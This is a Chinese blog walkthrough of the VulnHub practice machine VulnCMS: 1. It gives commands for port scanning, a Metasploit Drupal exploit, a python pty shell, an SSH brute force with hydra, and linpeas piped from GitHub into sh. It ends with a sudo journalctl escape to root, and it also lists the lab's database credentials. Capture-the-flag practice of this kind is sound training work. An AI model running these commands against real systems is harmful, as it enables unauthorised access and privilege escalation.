vulnhub之 VulnCMS: 1

                                                      VulnCMS: 1

信息搜集

首先进行ip扫描

看看开启了哪些端口

对端口进行扫描

 nmap -sC -sV -p 22,5000,80,8081,9001 192.168.181.146 --min-rate=2000

获取shell

在端口协议上进行扫描发现三个 WordPress 5.7.2 Joomla drupal,于是在msf上进行查看

我尝试了第八个,可是不行

 

于是我来测试最后一个

 search drupal

好像可以

输入shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

首先查看所有的wordpress

find / -type d -name  "wordpress" 2>/dev/null

于是在/html/wordpress/public_html 发现了wordpress数据库的用户名密码

find / -type d -name  "joomla" 2>/dev/null

于是找到了joomla数据库的用户名密码

我在查看INSTALL.sqlite.txt他告诉我了 drupal的用户名密码所在位置

于是我在/VAR/WWW//html/drupal/sites/default发现了用户名

 这是所有数据库的用户名和密码

                         user

                           passwd

drupal_admin

p@$$_C!rUP@!_cM5

joomla_admin

j00m1_@_dBpA$$

wp_admin

UUs3R_C!B@p@55

于是进入到数据库

对其进行解密,无效

在查看joomla数据库中的email特别像密码

在home目录下有三个用户

于是进行暴力破解 (用户名放在user.txt 密码放在passwd.txt)

hydra -L user.txt  -P passwd.txt   ssh://192.168.181.146

于是获得了用户名密码,进行ssh登录

登录成功

于是获得第一个flag

由于我无法查看其他目录,要重新定位

python3 -c 'import os; os.system("/bin/bash");'

提权

发现elliot用户无法提权

于是对tyrell进行密码破解,首先运行/linpeas.sh 输出为1.txt

curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh > 1.txt(要开加速器)

获得了用户名密码,进行ssh登录

sudo -l 提示/bin/journalctl进行提权

sudo journalctl

!/bin/sh

获得最终flag

 

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值